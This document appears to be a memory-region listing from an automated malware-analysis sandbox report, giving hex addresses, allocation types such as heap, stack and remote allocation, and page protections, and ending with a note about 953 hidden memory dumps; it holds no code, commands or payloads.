9CB0000
heap
page read and write
25950000
trusted library allocation
page read and write
607A000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
7A21000
remote allocation
page execute and read and write
431000
unkown
page read and write
27936000
trusted library allocation
page read and write
2F80000
direct allocation
page read and write
27EE0000
trusted library allocation
page read and write
267D3000
trusted library allocation
page read and write
9120000
direct allocation
page execute and read and write
285C0000
trusted library allocation
page read and write
22EF000
stack
page read and write
267D8000
trusted library allocation
page read and write
286A6000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27B2E000
stack
page read and write
26B2F000
trusted library allocation
page read and write
25570000
direct allocation
page read and write
27910000
trusted library allocation
page read and write
9EA8000
heap
page read and write
27C3B000
heap
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2547C000
stack
page read and write
27EE0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
741E000
stack
page read and write
285B0000
trusted library allocation
page read and write
26771000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285AF000
stack
page read and write
27B70000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
2F90000
direct allocation
page read and write
4CD0000
trusted library allocation
page execute and read and write
47B0000
heap
page read and write
4ED0000
heap
page execute and read and write
27870000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2A66000
trusted library allocation
page execute and read and write
28690000
trusted library allocation
page execute and read and write
285B0000
trusted library allocation
page read and write
2395000
heap
page read and write
2A80000
trusted library allocation
page execute and read and write
285F0000
trusted library allocation
page read and write
2A50000
trusted library allocation
page read and write
25825000
trusted library allocation
page read and write
D851000
direct allocation
page execute and read and write
27E8E000
stack
page read and write
27910000
trusted library allocation
page read and write
27C30000
heap
page read and write
27910000
trusted library allocation
page read and write
26AAB000
trusted library allocation
page read and write
26921000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
26887000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
28710000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
9C60000
heap
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
9EBD000
heap
page read and write
285B0000
trusted library allocation
page read and write
5037000
trusted library allocation
page read and write
25C1F000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
27C1F000
heap
page read and write
90EE000
stack
page read and write
608F000
trusted library allocation
page read and write
25AB8000
trusted library allocation
page read and write
78E0000
trusted library allocation
page read and write
5221000
remote allocation
page execute and read and write
2591F000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
773E000
stack
page read and write
7CD000
trusted library allocation
page execute and read and write
285B0000
trusted library allocation
page read and write
25A29000
trusted library allocation
page read and write
4809000
trusted library allocation
page read and write
B051000
direct allocation
page execute and read and write
27920000
trusted library allocation
page read and write
26799000
trusted library allocation
page read and write
47F0000
trusted library allocation
page read and write
25815000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
26899000
trusted library allocation
page read and write
285C0000
trusted library allocation
page execute and read and write
88F0000
trusted library allocation
page execute and read and write
285B0000
trusted library allocation
page read and write
267DA000
trusted library allocation
page read and write
25650000
heap
page execute and read and write
9EC0000
heap
page read and write
27ED0000
trusted library allocation
page execute and read and write
2691F000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
5AE000
stack
page read and write
758B000
heap
page read and write
27B70000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
199000
stack
page read and write
27EE0000
trusted library allocation
page read and write
25958000
trusted library allocation
page read and write
26A87000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
5F09000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2685B000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27E0D000
stack
page read and write
285C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285E0000
trusted library allocation
page read and write
254E0000
remote allocation
page read and write
27B96000
heap
page read and write
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
27930000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
285F0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
26A7B000
trusted library allocation
page read and write
2694F000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
6F30000
direct allocation
page read and write
285B0000
trusted library allocation
page read and write
286D0000
trusted library allocation
page read and write
7860000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
48E7000
heap
page read and write
27EE0000
trusted library allocation
page read and write
26B48000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
7C3000
trusted library allocation
page execute and read and write
2A75000
trusted library allocation
page execute and read and write
27B70000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
25829000
trusted library allocation
page read and write
254E0000
remote allocation
page read and write
27911000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
88D2000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
9DE0000
direct allocation
page read and write
24E10000
direct allocation
page read and write
9100000
trusted library allocation
page execute and read and write
9EC0000
heap
page read and write
2581D000
trusted library allocation
page read and write
2F50000
direct allocation
page read and write
9821000
remote allocation
page execute and read and write
25607000
stack
page read and write
26ACE000
trusted library allocation
page read and write
25A58000
trusted library allocation
page read and write
58A8000
trusted library allocation
page read and write
2682A000
trusted library allocation
page read and write
26A3A000
trusted library allocation
page read and write
86D4000
heap
page read and write
CE51000
direct allocation
page execute and read and write
26AC4000
trusted library allocation
page read and write
8300000
heap
page read and write
28670000
trusted library allocation
page read and write
27B80000
heap
page execute and read and write
8A80000
heap
page read and write
257E3000
trusted library allocation
page read and write
26AEF000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
2CD0000
heap
page read and write
27910000
trusted library allocation
page read and write
7540000
heap
page read and write
4822000
trusted library allocation
page read and write
24DF0000
direct allocation
page read and write
27EE0000
trusted library allocation
page read and write
26848000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
48D0000
heap
page readonly
27A23000
heap
page read and write
2A80000
heap
page read and write
27910000
trusted library allocation
page read and write
4821000
remote allocation
page execute and read and write
88E0000
trusted library allocation
page execute and read and write
251EE000
stack
page read and write
25819000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
90F0000
trusted library allocation
page execute and read and write
27910000
trusted library allocation
page read and write
27845000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
286F0000
trusted library allocation
page read and write
27BB7000
heap
page read and write
837D000
stack
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
2F00000
direct allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27870000
trusted library allocation
page read and write
27920000
trusted library allocation
page read and write
27B7D000
trusted library allocation
page read and write
4EE1000
trusted library allocation
page read and write
2EED000
heap
page read and write
E251000
direct allocation
page execute and read and write
4D49000
heap
page read and write
285B0000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
9CFE000
unkown
page read and write
28690000
trusted library allocation
page read and write
25927000
trusted library allocation
page read and write
2F70000
direct allocation
page read and write
2695B000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2399000
heap
page read and write
7C0000
trusted library allocation
page read and write
4825000
trusted library allocation
page execute and read and write
25720000
heap
page read and write
28670000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
7452000
heap
page read and write
75B0000
heap
page read and write
25925000
trusted library allocation
page read and write
400000
unkown
page readonly
27910000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
408000
unkown
page readonly
285B0000
trusted library allocation
page read and write
8670000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
25B39000
trusted library allocation
page read and write
8734000
heap
page read and write
26A9D000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
28680000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
2E00000
heap
page read and write
7F7B0000
trusted library allocation
page execute and read and write
285C0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
9110000
direct allocation
page execute and read and write
285B0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page execute and read and write
26916000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
26AD0000
trusted library allocation
page read and write
255CB000
stack
page read and write
25963000
trusted library allocation
page read and write
27EE0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
26A01000
trusted library allocation
page read and write
2677B000
trusted library allocation
page read and write
28700000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
6F40000
direct allocation
page read and write
285B0000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
28670000
trusted library allocation
page read and write
90AE000
stack
page read and write
655000
heap
page read and write
9FF000
unkown
page read and write
285B0000
trusted library allocation
page read and write
26879000
trusted library allocation
page read and write
2370000
heap
page read and write
8460000
trusted library allocation
page read and write
2A60000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
8822000
heap
page read and write
285B0000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
257DF000
trusted library allocation
page read and write
27860000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27910000
trusted library allocation
page read and write
27B70000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
269C8000
trusted library allocation
page read and write
26841000
trusted library allocation
page read and write
26859000
trusted library allocation
page read and write
3190000
heap
page read and write
26824000
trusted library allocation
page read and write
870A000
heap
page read and write
87B5000
heap
page read and write
27EE0000
trusted library allocation
page read and write
25932000
trusted library allocation
page read and write
26AE7000
trusted library allocation
page read and write
25878000
trusted library allocation
page read and write
2598E000
trusted library allocation
page read and write
25BF1000
trusted library allocation
page read and write
285B0000
trusted library allocation
page read and write
There are 953 hidden memdumps, click here to show them.